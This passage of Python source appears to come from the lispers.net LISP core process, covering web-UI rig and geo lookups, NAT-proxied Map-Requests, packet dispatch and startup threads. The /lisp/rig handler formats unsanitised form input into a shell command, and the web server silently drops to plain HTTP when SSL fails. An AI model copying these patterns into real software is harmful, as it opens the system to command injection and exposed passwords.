    geo = lisp.space(4) + "geo:"
    output = output.replace("geo:", geo)
    elp = lisp.space(4) + "elp:"
    output = output.replace("elp:", elp)
    rle = lisp.space(4) + "rle:"
    output = output.replace("rle:", rle)
    return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#enddef
#
# lisp_rig_command
#
# Do interactive rig.
#
@bottle.post('/lisp/rig')
def lisp_rig_command():
    """Run the lisp-rig tool from the web UI and return its output as an
    HTML page. Form fields: eid, ddt (DDT node), follow."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    eid = bottle.request.forms.get("eid")
    ddt = bottle.request.forms.get("ddt")
    follow_all = "follow-all-referrals" if \
        bottle.request.forms.get("follow") == "yes" else ""
    #
    # Default ddt-node to localhost.
    #
    if (ddt == ""): ddt = "localhost"
    #
    # Check for no input. User error.
    #
    if (eid == ""):
        output = "Need to supply EID address"
        return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
    #endif
    #
    # Prefer the source file; "-O lisp-rig.pyo" makes python run the
    # optimized bytecode when only the .pyo is installed.
    #
    rig = ""
    if os.path.exists("lisp-rig.pyo"): rig = "-O lisp-rig.pyo"
    if os.path.exists("lisp-rig.py"): rig = "lisp-rig.py"
    #
    # Something went wrong with the install.
    #
    if (rig == ""):
        output = "Cannot find lisp-rig.py or lisp-rig.pyo"
        return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
    #endif
    command = 'python {} "{}" to {} {}'.format(rig, eid, ddt, follow_all)
    output = commands.getoutput(command)
    output = output.replace("\n", "<br>")
    output = lisp.convert_font(output)
    # Indent the "Referrals:" keyword so the output reads hierarchically.
    ref = lisp.space(2) + "Referrals:"
    output = output.replace("Referrals:", ref)
    return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#enddef
#
# lisp_run_geo_lig
#
# Do lookup on both supplied EIDs passed as input parameters and return
# a geo-point and geo-prefix if they are found in RLOC records.
#
def lisp_run_geo_lig(eid1, eid2):
    """Lig both EIDs in the mapping system and return a 2-element list of
    geo-strings (one per EID). An entry is None when no "geo:" RLOC-record
    was found for that EID; EIDs already in geo-coordinate format are
    returned as-is without a lookup."""
    lig = None
    if os.path.exists("lisp-lig.pyo"): lig = "-O lisp-lig.pyo"
    if os.path.exists("lisp-lig.py"): lig = "lisp-lig.py"
    if (lig == None): return([None, None])
    #
    # First get a map-resolver address from ./lisp.config.
    #
    o = commands.getoutput("egrep -A 2 'lisp map-resolver {' ./lisp.config")
    mr = None
    for keyword in ["address = ", "dns-name = "]:
        mr = None
        index = o.find(keyword)
        if (index == -1): continue
        mr = o[index+len(keyword)::]
        index = mr.find("\n")
        if (index == -1): continue
        mr = mr[0:index]
        break
    #endfor
    if (mr == None): return([None, None])
    #
    # Lookup EIDs in loop.
    #
    addr = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
    geos = []
    for eid in [eid1, eid2]:
        #
        # Don't do lookups for Geo-Coordinates. Only for EIDs that are not
        # in Geo-Coordinate format.
        #
        if (addr.is_geo_string(eid)):
            geos.append(eid)
            continue
        #endif
        #
        # Try a plain lookup first, then retry with "no-info" appended.
        # Append None only when the second (final) attempt also fails.
        #
        command = 'python {} "{}" to {} count 1'.format(lig, eid, mr)
        for cmd in [command, command + " no-info"]:
            #
            # Bug fix: execute 'cmd' (the loop variable). The old code ran
            # 'command' both times, so the "no-info" retry never happened.
            #
            output = commands.getoutput(cmd)
            index = output.find("geo: ")
            if (index == -1):
                if (cmd != command): geos.append(None)
                continue
            #endif
            output = output[index+len("geo: ")::]
            index = output.find("\n")
            if (index == -1):
                if (cmd != command): geos.append(None)
                continue
            #endif
            geos.append(output[0:index])
            break
        #endfor
    #endfor
    return(geos)
#enddef
#
# lisp_geo_command
#
# Do geo lookups from lisp.lisp_geo() functions.
#
@bottle.post('/lisp/geo')
def lisp_geo_command():
    """Compare a geo-point with a geo-prefix from the web UI.

    Form fields "geo-point" and "geo-prefix" may each be either a literal
    geo-coordinate string or an EID; EIDs are resolved to geo data with
    lisp-lig. Renders both coordinates, the distance between them, and
    whether the point lies inside the prefix's radius."""
    if (lispconfig.lisp_validate_user() == False):
        return(lisp_core_login_page())
    #endif
    eid = bottle.request.forms.get("geo-point")
    eid_prefix = bottle.request.forms.get("geo-prefix")
    output = ""
    #
    # If an EID in the form of an IP address or distinguish-name, run a
    # lig to get record from mapping database to obtain the geo data.
    #
    gs = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
    geo_point = lisp.lisp_geo("")
    geo_prefix = lisp.lisp_geo("")
    point, prefix = lisp_run_geo_lig(eid, eid_prefix)
    #
    # Check EID format if geo-coordinate or return geo-point from database
    # lookup.
    #
    if (gs.is_geo_string(eid)):
        if (geo_point.parse_geo_string(eid) == False):
            output = "Could not parse geo-point format"
        #endif
    elif (point == None):
        output = "EID {} lookup could not find geo-point".format(
            lisp.bold(eid, True))
    elif (geo_point.parse_geo_string(point) == False):
        output = "Could not parse geo-point format returned from lookup"
    #endif
    #
    # Geo-point is good, now check EID-prefix or geo-prefix format returned
    # from database lookup.
    #
    if (output == ""):
        if (gs.is_geo_string(eid_prefix)):
            if (geo_prefix.parse_geo_string(eid_prefix) == False):
                output = "Could not parse geo-prefix format"
            #endif
        elif (prefix == None):
            output = "EID-prefix {} lookup could not find geo-prefix".format( \
                lisp.bold(eid_prefix, True))
        elif (geo_prefix.parse_geo_string(prefix) == False):
            output = "Could not parse geo-prefix format returned from lookup"
        #endif
    #endif
    #
    # No input errors. Return good results. Otherwise, error response in
    # variable 'output'.
    #
    if (output == ""):
        # Only echo the original EID strings when they differ from the
        # resolved geo strings.
        eid = "" if (eid == point) else ", EID {}".format(eid)
        eid_prefix = "" if (eid_prefix == prefix) else \
            ", EID-prefix {}".format(eid_prefix)
        point_str = geo_point.print_geo_url()
        prefix_str = geo_prefix.print_geo_url()
        km = geo_prefix.radius
        dd_point = geo_point.dms_to_decimal()
        dd_point = (round(dd_point[0], 6), round(dd_point[1], 6))
        dd_prefix = geo_prefix.dms_to_decimal()
        dd_prefix = (round(dd_prefix[0], 6), round(dd_prefix[1], 6))
        distance = round(geo_prefix.get_distance(geo_point), 2)
        inside = "inside" if geo_prefix.point_in_circle(geo_point) else \
            "outside"
        spo = lisp.space(2)
        spe = lisp.space(1)
        sd = lisp.space(3)
        output = ("Geo-Point:{}{} {}{}<br>Geo-Prefix:{}{} {}, {} " + \
            "kilometer radius{}<br>").format(spo, point_str, dd_point, eid,
            spe, prefix_str, dd_prefix, km, eid_prefix)
        output += "Distance:{}{} kilometers, point is {} of circle".format(sd,
            distance, lisp.bold(inside, True))
    #endif
    return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#enddef
#
# lisp_get_info_source
#
# See if this source has sent an Info-Request and we are caching it so we
# can proxy Map-Request for it. Either address OR nonce can be supplied to
# determine if we are doing a lookup based on address or nonce.
#
def lisp_get_info_source(addr_str, port, nonce):
    """Return the cached Info-Request source matching either the supplied
    (addr_str, port) pair or the supplied nonce, or None when no entry is
    cached. Pass addr_str=None to look up by nonce and vice versa."""
    if (addr_str != None):
        for isrc in lisp.lisp_info_sources_by_address.values():
            if (isrc.port != port): continue
            if (isrc.address.print_address_no_iid() == addr_str):
                return(isrc)
            #endif
        #endfor
        return(None)
    #endif
    if (nonce != None):
        return(lisp.lisp_info_sources_by_nonce.get(nonce, None))
    #endif
    return(None)
#enddef
#
# lisp_nat_proxy_map_request
#
# Grab the nonce from the Map-Request, store it in the info-source data
# structure and modify the ITR-RLOCs field so the Map-Reply comes back to us.
#
def lisp_nat_proxy_map_request(lisp_sockets, info_source, packet):
    """Proxy a Map-Request on behalf of a NAT'd info-source.

    Caches the request nonce on the info-source and rewrites the
    ITR-RLOCs to our own RLOC so the Map-Reply returns here. Returns True
    when the packet was consumed (proxied or a decode error occurred);
    returns False when our RLOC is already in the ITR-RLOCs list (possible
    loop) so the caller should process the Map-Request normally."""
    #
    # Parse and move packet pointer to beginning of Map-Request.
    #
    ecm = lisp.lisp_ecm(0)
    packet = ecm.decode(packet)
    if (packet == None):
        lisp.lprint("Could not decode ECM packet")
        return(True)
    #endif
    header = lisp.lisp_control_header()
    if (header.decode(packet) == None):
        lisp.lprint("Could not decode control header")
        return(True)
    #endif
    if (header.type != lisp.LISP_MAP_REQUEST):
        lisp.lprint("Received ECM without Map-Request inside")
        return(True)
    #endif
    #
    # We are at the Map-Request header.
    #
    map_request = lisp.lisp_map_request()
    packet = map_request.decode(packet, None, 0)
    nonce = map_request.nonce
    addr_str = info_source.address.print_address_no_iid()
    #
    # Print Map-Request again to show what has changed.
    #
    map_request.print_map_request()
    lisp.lprint("Process {} from info-source {}, port {}, nonce 0x{}". \
        format(lisp.bold("nat-proxy Map-Request", False),
        lisp.red(addr_str, False), info_source.port,
        lisp.lisp_hex_string(nonce)))
    #
    # Store nonce in info-source and cache in dictionary array. We will need
    # to find it based on nonce when the Map-Reply is returned to us.
    #
    info_source.cache_nonce_for_info_source(nonce)
    #
    # Do not timeout Map-Requests that are subscription-requests. Because a
    # Map-Notify can be triggered any time back to the requester.
    #
    info_source.no_timeout = map_request.subscribe_bit
    #
    # Check if we are already in ITR-RLOCs list. If so, this could be looping.
    # Return so the Map-Request can be processed in the regular fashion (that
    # is, send on DDT or to a Map-Resolver.
    #
    for itr_rloc in map_request.itr_rlocs:
        if (itr_rloc.is_local()): return(False)
    #endfor
    #
    # Store new ITR-RLOCs list: just our own RLOC, preferring the IPv6
    # local RLOC for IPv6 target-EIDs when one exists.
    #
    myself = lisp.lisp_myrlocs[0]
    map_request.itr_rloc_count = 0
    map_request.itr_rlocs = []
    map_request.itr_rlocs.append(myself)
    packet = map_request.encode(None, 0)
    map_request.print_map_request()
    deid = map_request.target_eid
    if (deid.is_ipv6()):
        myself_v6 = lisp.lisp_myrlocs[1]
        if (myself_v6 != None): myself = myself_v6
    #endif
    #
    # Send ECM based Map-Request to Map-Resolver (or to the local
    # map-server process when one is running on this system).
    #
    ms = lisp.lisp_is_running("lisp-ms")
    lisp.lisp_send_ecm(lisp_sockets, packet, deid, lisp.LISP_CTRL_PORT,
        deid, myself, to_ms=ms, ddt=False)
    return(True)
#enddef
#
# lisp_nat_proxy_reply
#
# Grab the nonce from the Map-Request, store it in the info-source data
# structure and modify the ITR-RLOCs field so the Map-Reply/Notify comes
# back to us.
#
def lisp_nat_proxy_reply(lisp_sockets, info_source, packet, mr_or_mn):
    """Forward a Map-Reply (mr_or_mn True) or Map-Notify (mr_or_mn False)
    back to the translated address and port of a NAT'd info-source."""
    addr_str = info_source.address.print_address_no_iid()
    what = "Reply" if mr_or_mn else "Notify"
    what = lisp.bold("nat-proxy Map-{}".format(what), False)
    lisp.lprint("Forward {} to info-source {}, port {}, nonce 0x{}".format( \
        what, lisp.red(addr_str, False), info_source.port,
        lisp.lisp_hex_string(info_source.nonce)))
    #
    # Send on socket with arguments passed from IPC message.
    #
    dest = lisp.lisp_convert_4to6(addr_str)
    lisp.lisp_send(lisp_sockets, dest, info_source.port, packet)
#enddef
#
# lisp_core_dispatch_packet
#
# Look at packet type and decide which process to send it to.
#
def lisp_core_dispatch_packet(lisp_sockets, source, sport, packet):
    """Inspect a received LISP control packet and hand it to the right
    component process (lisp-ms, lisp-itr, lisp-etr, lisp-rtr, lisp-mr,
    lisp-ddt) over the IPC socket, or process it here (Info-Requests and
    NAT-proxied Map-Requests/Replies/Notifies)."""
    global lisp_ipc_socket
    header = lisp.lisp_control_header()
    if (header.decode(packet) == None):
        lisp.lprint("Could not decode control header")
        return
    #endif
    #
    # In the lispers.net implementation any LISP system can process Info-
    # Requests. We'll have the lisp-core process do this. lig/rig and the
    # lisp-etr process sends Info-Requests messages. Since the lisp-core
    # process processes Info-Requests, it responds with Info-Reply messages.
    # And they are sent to the emphemeral port so go straight back to the lig/
    # rig, or etr-processes.
    #
    if (header.type == lisp.LISP_NAT_INFO):
        if (header.info_reply == False):
            lisp.lisp_process_info_request(lisp_sockets, packet, source, sport,
                lisp.lisp_ms_rtr_list)
        #endif
        return
    #endif
    # Keep the raw packet; 'packet' becomes the IPC-framed copy below.
    local_packet = packet
    packet = lisp.lisp_packet_ipc(packet, source, sport)
    #
    # Map-Registers and Map-Notify-Acks go to the lisp-ms process.
    #
    if (header.type in (lisp.LISP_MAP_REGISTER, lisp.LISP_MAP_NOTIFY_ACK)):
        lisp.lisp_ipc(packet, lisp_ipc_socket, "lisp-ms")
        return
    #endif
    #
    # Map-Reply messages go to ITRs -- unless they answer a NAT-proxied
    # Map-Request (forward to the info-source) or a local lig client is
    # running (IPC to /tmp/lisp-lig).
    #
    if (header.type == lisp.LISP_MAP_REPLY):
        map_reply = lisp.lisp_map_reply()
        map_reply.decode(local_packet)
        info_source = lisp_get_info_source(None, 0, map_reply.nonce)
        if (info_source):
            lisp_nat_proxy_reply(lisp_sockets, info_source, local_packet, True)
        else:
            lig = "/tmp/lisp-lig"
            if (os.path.exists(lig)):
                lisp.lisp_ipc(packet, lisp_ipc_socket, lig)
            else:
                lisp.lisp_ipc(packet, lisp_ipc_socket, "lisp-itr")
            #endif
        #endif
        return
    #endif
    #
    # Map-Notify messages: same NAT-proxy / lig-client handling as
    # Map-Replies, otherwise to the RTR if running, else the ETR.
    #
    if (header.type == lisp.LISP_MAP_NOTIFY):
        map_notify = lisp.lisp_map_notify(lisp_sockets)
        map_notify.decode(local_packet)
        info_source = lisp_get_info_source(None, 0, map_notify.nonce)
        if (info_source):
            lisp_nat_proxy_reply(lisp_sockets, info_source, local_packet,
                False)
        else:
            lig = "/tmp/lisp-lig"
            if (os.path.exists(lig)):
                lisp.lisp_ipc(packet, lisp_ipc_socket, lig)
            else:
                process = "lisp-rtr" if lisp.lisp_is_running("lisp-rtr") else \
                    "lisp-etr"
                lisp.lisp_ipc(packet, lisp_ipc_socket, process)
            #endif
        #endif
        return
    #endif
    #
    # Map-Referral messages go to MRs. But if a rig client is running on
    # this machine, IPC it to the client.
    #
    if (header.type == lisp.LISP_MAP_REFERRAL):
        rig = "/tmp/lisp-rig"
        if (os.path.exists(rig)):
            lisp.lisp_ipc(packet, lisp_ipc_socket, rig)
        else:
            lisp.lisp_ipc(packet, lisp_ipc_socket, "lisp-mr")
        #endif
        return
    #endif
    #
    # Map-Requests go to ETRs/RTRs when they RLOC-probes or SMR-invoked
    # requests. And Map-Requests go to ITRs when they are SMRs.
    #
    if (header.type == lisp.LISP_MAP_REQUEST):
        process = "lisp-itr" if (header.is_smr()) else "lisp-etr"
        #
        # RLOC-probes are received specifically by the process by pcaping
        # on port 4342.
        #
        if (header.rloc_probe): return
        lisp.lisp_ipc(packet, lisp_ipc_socket, process)
        return
    #endif
    #
    # ECMs can go to a lot of places. They are sent ITR->MR, LIG->MR, MR->DDT,
    # MR->MS, and MS->ETR. If we find an Info-Request source, this core
    # process will process the Map-Request so it can get the Map-Reply and
    # forward to the translated address and port of a client behind a NAT.
    #
    if (header.type == lisp.LISP_ECM):
        info_source = lisp_get_info_source(source, sport, None)
        if (info_source):
            if (lisp_nat_proxy_map_request(lisp_sockets, info_source,
                local_packet)): return
        #endif
        process = "lisp-mr"
        if (header.is_to_etr()):
            process = "lisp-etr"
        elif (header.is_to_ms()):
            process = "lisp-ms"
        elif (header.is_ddt()):
            if (lisp.lisp_is_running("lisp-ddt")):
                process = "lisp-ddt"
            elif (lisp.lisp_is_running("lisp-ms")):
                process = "lisp-ms"
            #endif
        elif (lisp.lisp_is_running("lisp-mr") == False):
            process = "lisp-etr"
        #endif
        lisp.lisp_ipc(packet, lisp_ipc_socket, process)
    #endif
    return
#enddef
#
# lisp_ssl_server
#
# Setup cherrypy server that supports SSL connections. This is so we can
# protect passwords that flow over an http connection.
#
# Used the following to create private key and cert:
#
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
#
class lisp_ssl_server(bottle.ServerAdapter):
    """Bottle server adapter wrapping CherryPy's WSGI server with SSL so
    web-UI passwords are protected in transit.

    Key and certificate both come from ./lisp-cert.pem; if the user did
    not supply one, a copy of lisp-cert.pem.default is made. A key/cert
    pair can be created with:
      openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
    """
    def run(self, hand):
        # 'hand' is the WSGI handler bottle passes in; serve it until
        # shutdown, always stopping the server on exit.
        cert = "./lisp-cert.pem"
        #
        # Use user provided lisp-cert.pem if it exists. Otherwise use the
        # lispers.net default lisp-cert.pem.default file.
        #
        if (os.path.exists(cert) == False):
            os.system("cp ./lisp-cert.pem.default {}".format(cert))
            lisp.lprint(("{} does not exist, creating a copy from lisp-" + \
                "cert.pem.default").format(cert))
        #endif
        # The same PEM file supplies both the certificate and private key.
        server = wsgiserver.CherryPyWSGIServer((self.host, self.port), hand)
        server.ssl_adapter = pyOpenSSLAdapter(cert, cert, None)
        # context = SSL.Context(SSL.SSLv23_METHOD)
        # server.ssl_adapter.context = context
        try:
            server.start()
        finally:
            server.stop()
        #endtry
    #enddef
#endclass
#
# lisp_bottle_ipv4_process
#
# Variable bottle_port can take on the following values:
#
# 8080 - run web server on port 8080 using SSL
# 443 - run web server on port 443 using SSL
# -8080 - run web server on port 8080 with no SSL (no secure connection).
#
# Any other port is accepted and used with SSL. If a "-" precedes it, it is
# used with no SSL.
#
def lisp_bottle_ipv4_process(bottle_port):
    """Run the bottle web server on IPv4.

    bottle_port > 0: listen on that port with SSL (lisp-ssl-server).
    bottle_port < 0: listen on abs(port) with NO SSL.
    If the SSL server fails to start, fall back to plain HTTP."""
    lisp.lisp_set_exception()
    #
    # No security. Usually for testing purposes or complexities installing
    # OpenSSL.
    #
    if (bottle_port < 0):
        bottle.run(host="0.0.0.0", port=-bottle_port)
        return
    #endif
    bottle.server_names["lisp-ssl-server"] = lisp_ssl_server
    #
    # Try the SSL server first; on any startup failure run without SSL.
    #
    try:
        bottle.run(host="0.0.0.0", port=bottle_port, server="lisp-ssl-server",
            fast=True)
    except:
        bottle.run(host="0.0.0.0", port=bottle_port, fast=True)
    #endtry
    return
#enddef
#
# lisp_bottle_ipv6_process
#
# Start HTTP server on port 8080. But bottle does not support IPv6 yet so
# we comment out the call.
#
def lisp_bottle_ipv6_process():
    """Placeholder for an IPv6 web server. Bottle does not support IPv6
    here yet, so the run() call stays commented out."""
    lisp.lisp_set_exception()
    # run(host="0::0", port=8080)
    return
#enddef
#
# lisp_check_processes
#
# Check to see if any component has gone down when it should be running. And
# if it comes up when it should be running, download the configuration commands
# it is responsible for.
#
def lisp_check_processes(lisp_socket):
    """Monitor the LISP component processes once per second (thread loop).

    Logs whenever a component changes up/down state, and pushes that
    component's configuration commands to it when it (re)appears."""
    lisp.lisp_set_exception()
    status = {"lisp-itr" : False, "lisp-etr" : False, "lisp-rtr" : False,
        "lisp-mr" : False, "lisp-ms" : False, "lisp-ddt" : False}
    while (True):
        time.sleep(1)
        # Rebuild the status map each pass and diff against the last one.
        old_status = status
        status = {}
        for process in old_status:
            status[process] = lisp.lisp_is_running(process)
            if (old_status[process] == status[process]): continue
            lisp.lprint("*** Process '{}' has {} ***".format(process,
                "come up" if status[process] else "gone down"))
            #
            # If process has come up, send configuration commands. Hold the
            # IPC lock so config pushes don't interleave with show commands.
            #
            if (status[process] == True):
                lisp.lisp_ipc_lock.acquire()
                lispconfig.lisp_send_commands(lisp_socket, process)
                lisp.lisp_ipc_lock.release()
            #endif
        #endfor
    #endwhile
    return
#enddef
#
# lisp_timeout_info_sources
#
# Timeout info sources from lisp.lisp_info_sources_by_address{}.
#
def lisp_timeout_info_sources():
    """Periodically age out cached NAT Info-Request sources (thread loop).

    Every 60 seconds, remove entries from
    lisp.lisp_info_sources_by_address (and their nonce index in
    lisp.lisp_info_sources_by_nonce) whose uptime timestamp is more than
    60 seconds in the past. Entries flagged no_timeout (subscription
    requests) are never removed."""
    lisp.lisp_set_exception()
    timeout = 60
    while (True):
        time.sleep(timeout)
        delete_list = []
        now = lisp.lisp_get_timestamp()
        #
        # Find entries that are greater than 1 minute old. Bug fix: the
        # comparison was inverted ('< now: continue'), which skipped stale
        # entries and deleted fresh ones; now we skip entries still within
        # the timeout window and delete the stale ones.
        #
        for key in lisp.lisp_info_sources_by_address:
            info_source = lisp.lisp_info_sources_by_address[key]
            if (info_source.no_timeout): continue
            if (info_source.uptime + timeout > now): continue
            delete_list.append(key)
            nonce = info_source.nonce
            if (nonce == None): continue
            if (nonce in lisp.lisp_info_sources_by_nonce):
                lisp.lisp_info_sources_by_nonce.pop(nonce)
            #endif
        #endfor
        #
        # Go through delete list to remove from dictionary array.
        #
        for key in delete_list:
            lisp.lisp_info_sources_by_address.pop(key)
        #endfor
    #endwhile
    return
#enddef
#
# lisp_core_control_packet_process
#
# Listen for IPC messages from LISP componment processes. They want to send
# control packets out on the network from UDP port 4342.
#
def lisp_core_control_packet_process(lisp_ipc_control_socket, lisp_sockets):
    """IPC receive loop: LISP component processes ask the core process to
    transmit control packets from UDP port 4342.

    Messages are "control-packet@<dest>@<port>@<packet-bytes>"."""
    lisp.lisp_set_exception()
    while (True):
        try: packet_data = lisp_ipc_control_socket.recvfrom(9000)
        except: return(["", "", "", ""])
        data = packet_data[0].split("@")
        source = packet_data[1]
        opcode = data[0]
        dest = data[1]
        port = int(data[2])
        #
        # The packet payload may itself contain "@" bytes; the split above
        # fragments it and lisp_bit_stuff() rejoins the pieces.
        #
        packet = data[3::]
        if (len(packet) > 1):
            packet = lisp.lisp_bit_stuff(packet)
        else:
            packet = packet[0]
        #endif
        # NOTE(review): the log text below reads "receivedunexpected" --
        # a space is missing between the concatenated string halves.
        if (opcode != "control-packet"):
            lisp.lprint(("lisp_core_control_packet_process() received" + \
                "unexpected control-packet, message ignored"))
            continue
        #endif
        lisp.lprint(("{} {} bytes from {}, dest/port: {}/{}, control-" + \
            "packet: {}").format(lisp.bold("Receive", False), len(packet),
            source, dest, port, lisp.lisp_format_packet(packet)))
        #
        # Check if this is a Map-Reply to a ephem port and we have an
        # Info-Source for the nonce in the Map-Reply. If so, call
        # lisp_core_dispatch_packet().
        #
        header = lisp.lisp_control_header()
        header.decode(packet)
        if (header.type == lisp.LISP_MAP_REPLY):
            map_reply = lisp.lisp_map_reply()
            map_reply.decode(packet)
            if (lisp_get_info_source(None, 0, map_reply.nonce)):
                lisp_core_dispatch_packet(lisp_sockets, source, port, packet)
                continue
            #endif
        #endif
        #
        # This is a Map-Notify that the lisp-etr process received and it
        # has determined it is a (S,G) multicast Map-Notify that the lisp-itr
        # process needs to process to update its map-cache.
        #
        if (header.type == lisp.LISP_MAP_NOTIFY and source == "lisp-etr"):
            ipc = lisp.lisp_packet_ipc(packet, source, port)
            lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-itr")
            continue
        #endif
        #
        # We are sending on a udp46 socket, so if the destination is IPv6
        # we have an address format we can use. If destination is IPv4 we
        # need to put the address in a IPv6 IPv4-compatible format.
        #
        # NOTE(review): the first lisp_convert_4to6() result is immediately
        # overwritten -- looks like a dead store; confirm it has no needed
        # side effect before removing.
        #
        addr = lisp.lisp_convert_4to6(dest)
        addr = lisp.lisp_address(lisp.LISP_AFI_IPV6, "", 128, 0)
        if (addr.is_ipv4_string(dest)): dest = "::ffff:" + dest
        addr.store_address(dest)
        #
        # Send on socket with arguments passed from IPC message.
        #
        lisp.lisp_send(lisp_sockets, addr, port, packet)
    #endwhile
    return
#enddef
#
# lisp_core_cp_lisp_config
#
# The file ./lisp.config does not exist. Copy all commands from file
# lisp.config.example up to the dashed line.
#
def lisp_core_cp_lisp_config():
    """Create ./lisp.config from ./lisp.config.example.

    Copies lines up to and including the first full-width dashed comment
    line (of the form "#----...-#"). Called when no lisp.config exists."""
    f = open("./lisp.config.example", "r"); lines = f.read(); f.close()
    f = open("./lisp.config", "w")
    lines = lines.split("\n")
    for line in lines:
        f.write(line + "\n")
        #
        # Length check first -- blank lines made the old 'line[0]' test
        # raise IndexError before the length guard was evaluated.
        #
        if (len(line) >= 4 and line[0] == "#" and line[-1] == "#"):
            dashes = line[1:-2]
            dash_check = len(dashes) * "-"
            if (dashes == dash_check): break
        #endif
    #endfor
    f.close()
    return
#enddef
#
# lisp_core_startup
#
# Intialize this LISP core process. This function returns a LISP network
# listen socket.
#
def lisp_core_startup(bottle_port):

    #
    # Bring up the lisp-core process: banner/version info, the UDP 4342
    # control socket, the UDP 4341 data socket, the internal IPC sockets,
    # and the helper threads (control-packet forwarder, config watcher,
    # bottle web UI on bottle_port, health check, info-source timeout).
    # Returns True on success, False when no local addresses are found.
    #
    global lisp_build_date
    global lisp_control_listen_socket
    global lisp_ipc_socket
    global lisp_ipc_control_socket
    global lisp_sockets
    global lisp_encap_socket
    lisp.lisp_i_am("core")
    lisp.lisp_set_exception()
    lisp.lisp_print_banner("core-process starting up")
    lisp.lisp_uptime = lisp.lisp_get_timestamp()

    #
    # Version/build info come from files produced by the build. NOTE: the
    # "commands" module is Python-2 only.
    #
    lisp.lisp_version = commands.getoutput("cat lisp-version.txt")
    lisp_build_date = commands.getoutput("cat lisp-build-date.txt")

    #
    # Get local address for source RLOC for encapsulation.
    #
    if (lisp.lisp_get_local_addresses() == False): return(False)

    #
    # Only the core process uses a lock so it can send commands and show
    # output in parallel to the component processes.
    #
    lisp.lisp_ipc_lock = multiprocessing.Lock()

    #
    # If this is a development build, put a plus after the version number.
    # A development build is a build done from a directory that has the
    # lisp.py file. Released builds built from the build directory will build
    # only .pyo files.
    #
    if (os.path.exists("lisp.py")): lisp.lisp_version += "+"

    #
    # Open network socket to listen (and send) on port 4342. We may want
    # a Map-Resolver to respond with a source-address of an anycast address
    # so firewalls and NAT can return responses to ITRs or lig/rig clients.
    #
    address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
    if (os.getenv("LISP_ANYCAST_MR") == None or lisp.lisp_myrlocs[0] == None):
        lisp_control_listen_socket = lisp.lisp_open_listen_socket(address,
            str(lisp.LISP_CTRL_PORT))
    else:
        address = lisp.lisp_myrlocs[0].print_address_no_iid()
        lisp_control_listen_socket = lisp.lisp_open_listen_socket(address,
            str(lisp.LISP_CTRL_PORT))
    #endif
    lisp.lprint("Listen on {}, port 4342".format(address))

    #
    # Open datagram socket for 4341. We will not listen on it. We just don't
    # want the kernel to send port unreachables to ITRs and PITRs. If another
    # data-plane is running, it may listen on the data port 4341. Let it.
    #
    if (lisp.lisp_external_data_plane() == False):
        lisp_encap_socket = lisp.lisp_open_listen_socket(address,
            str(lisp.LISP_DATA_PORT))
        lisp.lprint("Listen on {}, port 4341".format(address))
    #endif

    #
    # Open internal socket to send from to LISP components for configuration
    # events.
    #
    lisp_ipc_socket = lisp.lisp_open_send_socket("lisp-core", "")
    lisp_ipc_socket.settimeout(3)

    #
    # Open internal socket 'lisp-core-pkt' so LISP components can send
    # control packets from UDP port 4342 via this lisp-core process.
    #
    lisp_ipc_control_socket = lisp.lisp_open_listen_socket("", "lisp-core-pkt")

    #
    # NOTE(review): the IPv4 and IPv6 slots of lisp_sockets reference the
    # same udp46 listen socket -- presumably intentional since one socket
    # serves both address families; confirm against lisp.lisp_send().
    #
    lisp_sockets = [lisp_control_listen_socket, lisp_control_listen_socket,
        lisp_ipc_socket]

    #
    # Start a thread to listen for control packet from LISP component
    # processes.
    #
    threading.Thread(target=lisp_core_control_packet_process,
        args=[lisp_ipc_control_socket, lisp_sockets]).start()

    #
    # Do a quick check to see if this is a first-time startup for the
    # system: if lisp.config was not created by the user, seed it from
    # lisp.config.example.
    #
    if (os.path.exists("./lisp.config") == False):
        lisp.lprint(("./lisp.config does not exist, creating a copy " + \
            "from lisp.config.example"))
        lisp_core_cp_lisp_config()
    #endif

    #
    # Check if we are a map-server listening on a multicast group. This
    # is a decentralized-xtr with a multicast map-server address. Then
    # start the thread that monitors configuration file changes.
    #
    lisp_check_decent_xtr_multicast(lisp_control_listen_socket)
    threading.Thread(target=lispconfig.lisp_config_process,
        args=[lisp_ipc_socket]).start()

    #
    # Start a new thread to run bottle for each address-family.
    #
    threading.Thread(target=lisp_bottle_ipv4_process,
        args=[bottle_port]).start()
    threading.Thread(target=lisp_bottle_ipv6_process, args=[]).start()

    #
    # Start a new thread to run LISP component health check.
    #
    threading.Thread(target=lisp_check_processes,
        args=[lisp_ipc_socket]).start()

    #
    # Start a new thread to time out Info-Sources.
    #
    threading.Thread(target=lisp_timeout_info_sources).start()
    return(True)
#enddef
#
# lisp_core_shutdown
#
# Shutdown process.
#
def lisp_core_shutdown():

    #
    # Close, in order, the IPC sockets and the network listen sockets that
    # lisp_core_startup() opened.
    #
    socket_list = [(lisp_ipc_socket, "lisp-core"),
        (lisp_ipc_control_socket, "lisp-core-pkt"),
        (lisp_control_listen_socket, ""), (lisp_encap_socket, "")]
    for s, internal_name in socket_list:
        lisp.lisp_close_socket(s, internal_name)
    #endfor
    return
#enddef
#
# lisp_check_decent_xtr_multicast
#
# Check to see if "decentralized-xtr = yes" and if any map-server clause has
# a multicast address configured. If so, setsockopt so we can receive
# multicast Map-Register messages.
#
# This function is robust enough for when a user copies lisp.config.example
# into lisp.config. We have to ignore text after "#- ... -#".
#
def lisp_check_decent_xtr_multicast(lisp_socket):

    #
    # Read the user configuration. Text after the "#- ... -#" dashed
    # separator (sample text copied from lisp.config.example) is ignored.
    #
    f = open("./lisp.config", "r"); lines = f.read(); f.close()
    lines = lines.split("\n")

    #
    # Check if "decentralized-xtr = yes" is in the "lisp xtr-parameters"
    # command clause. The separator test must take two-character slices;
    # the original line[0:1]/line[-2:-1] are single characters and could
    # never equal "#-"/"-#", so the guard never fired.
    #
    decent_xtr = False
    for line in lines:
        if (line[0:2] == "#-" and line[-2:] == "-#"): break
